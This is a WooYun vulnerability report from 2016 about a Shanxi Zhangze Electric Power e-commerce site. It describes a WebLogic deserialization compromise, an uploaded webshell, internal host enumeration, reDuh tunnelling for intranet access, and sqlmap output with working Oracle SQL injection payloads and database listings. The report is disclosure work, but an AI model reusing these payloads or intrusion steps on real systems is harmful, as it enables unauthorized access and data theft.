当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191172

漏洞标题:山西漳泽电力某站点命令执行\SQL注入(影响内网安全)

相关厂商:山西漳泽电力股份有限公司

漏洞作者: 路人甲

提交时间:2016-03-31 21:20

修复时间:2016-05-19 23:30

公开时间:2016-05-19 23:30

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

漳泽电力

详细说明:

漳泽电力电子商务网
http://**.**.**.**/
weblogic反序列化漏洞

以太网适配器 本地连接 2:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::7dc9:1f04:7405:173e%13
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**


写入shell:http://**.**.**.**/Liems/111.jspx

服务器名称            注解
------------------------------------------
\\AHB-WZ
\\AHB_LHZ
\\AHB_LYJ
\\AHB_LYQ
\\ASB_MXP
\\BGS_CL杨小军         杨小军
\\BGS_LY
\\CHINA-20121030O
\\DQB_MQ               123456
\\GSLD-WSY
\\HP-DFKCFOQQM81X
\\JHB_HP
\\JHB_QPL
\\JHB_RB
\\LENOVO-CF47097F
\\LENOVO-F7918C2C
\\RZB-HH               人事劳动部(黄华)
\\SERVER
\\TYXXPT-SJK
\\ZHKFB-LHS            zhkfb-lhs
\\ZZDL
\\ZZDL-CWB
命令成功完成。
>net view /domain
Domain
------------------------------------------
MSHOME
WORKGROUP
ZDZB
人事劳动部
新闻中心
营销部
命令成功完成。


数据库user与pass相同,翻看了一下数据库,基本上都是五金的订单什么的,没有太多有用的信息

数据库.png


之后使用reduh连接远程,可进行内网渗透

远程1.png


扫描部分内网端口

内网2.png


内网3.png


内网4.png


内网1.png


记着以前乌云上还有一个关于打印机渗透的,找了没找到

打印机.png


数百个公司的联系方式

xls.png

漏洞证明:

SQl注入

http://**.**.**.**/Liems/portal/detailCgxx.jsp?id=5237&name=ZC&type=ALL


1.png


2.png


Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6894=6894&name=ZC&type=ALL
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6637=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(69)||CHR(118)||CHR(110),5)&name=ZC&type=ALL
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=-1748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(102)||CHR(77)||CHR(99)||CHR(103)||CHR(85)||CHR(65)||CHR(67)||CHR(67)||CHR(68)||CHR(76)||CHR(118)||CHR(90)||CHR(117)||CHR(81)||CHR(98)||CHR(87)||CHR(82)||CHR(74)||CHR(76)||CHR(99)||CHR(114)||CHR(87)||CHR(103)||CHR(109)||CHR(117)||CHR(112)||CHR(81)||CHR(118)||CHR(83)||CHR(113)||CHR(109)||CHR(120)||CHR(116)||CHR(113)||CHR(80)||CHR(68)||CHR(68)||CHR(115)||CHR(117)||CHR(111)||CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- -&name=ZC&type=ALL
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIEMS5
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


Database: LIEMS5
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| PGFLBMST                   | 184428  |
| INTERFACE_REC              | 179147  |
| PTPTSMST                   | 174297  |
| POQTVMST                   | 172018  |
| INTERFACE_PRC              | 158603  |
| INTERFACE_REQ              | 120547  |
| ACTIONLOG                  | 119342  |
| PGPRTORGASSIGN             | 118573  |
| PGPRTORGLNK                | 118567  |
| DKONLINEUSERHISMST         | 114881  |
| BDPRHJMST                  | 91138   |
| INTERFACE_PLA              | 86087   |
| INTERFACE_ILD              | 76712   |
| INTERFACE_POH              | 69817   |
| BDPDTTYPELIN               | 65958   |
| INLS_REC                   | 43707   |
| DKTREEMENUTMP              | 43692   |
| INLS_PRC                   | 33576   |
| POPLALIN                   | 31068   |
| INLS_ILD                   | 29976   |
| BDWZQDLIN                  | 29685   |
| POQTLMST                   | 29543   |
| POQTPMST                   | 25514   |
| CMPMAMST                   | 24171   |
| INLS_REQ                   | 24144   |
| POPOLMST                   | 23627   |
| DKDOCMST                   | 22602   |
| PORTLETOBJPRE              | 22417   |
| INLS_POH                   | 20025   |
| BDSYGYSLIN                 | 19862   |
| INTERFACE_PMA              | 17973   |
| DKFLDMST                   | 17491   |
| PTPARTORGLINK              | 15874   |
| BDZZFILEMST                | 13377   |
| MSMENUOPERMST              | 12613   |
| PORTLETOBJECT              | 11214   |
| BDTODOMST                  | 8144    |
| INLS_PTS                   | 7648    |
| PGPRTLIN                   | 7636    |
| BDVENBMMST                 | 7031    |
| LPNOTEBOOKMST              | 6391    |
| DKROLEPERLNK               | 6319    |
| POPOHMST                   | 6189    |
| BDCGYTODOMST               | 5801    |
| POPLAMST                   | 5792    |
| BDXMLXMST                  | 5780    |
| POQTHMST                   | 5687    |
| POQTOMST                   | 5501    |
| PGMSGMST                   | 5434    |
| BDZBGGMST                  | 5045    |
| PGPGMMST                   | 4606    |
| BDWEBTBRMST                | 4353    |
| BDCGQDLIN                  | 3778    |
| PGLIMITPERMST              | 3385    |
| PORTALTAB                  | 2901    |
| PORTAL                     | 2774    |
| PORTALROLE                 | 2774    |
| CMEMPMST                   | 2718    |
| CMEMPPOSMST                | 2690    |
| DKPERSTLIN                 | 2502    |
| PGPRTMST                   | 2387    |
| DKKJGROUPMST               | 2360    |
| QUVDVENMST                 | 2294    |
| PGSGPLNK                   | 1904    |
| BDVENBGHISMST              | 1596    |
| COPY_EM_PGPGMMST           | 1485    |
| MSOPTMST                   | 1301    |
| DKPOPMST                   | 1239    |
| DKRELMST                   | 1179    |
| PGSGRMST                   | 1155    |
| DKSEQMST                   | 1038    |
| DKTBLMST                   | 1029    |


修复方案:

修复吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-04 23:24

厂商回复:

最新状态:

暂无

漏洞评价:

评价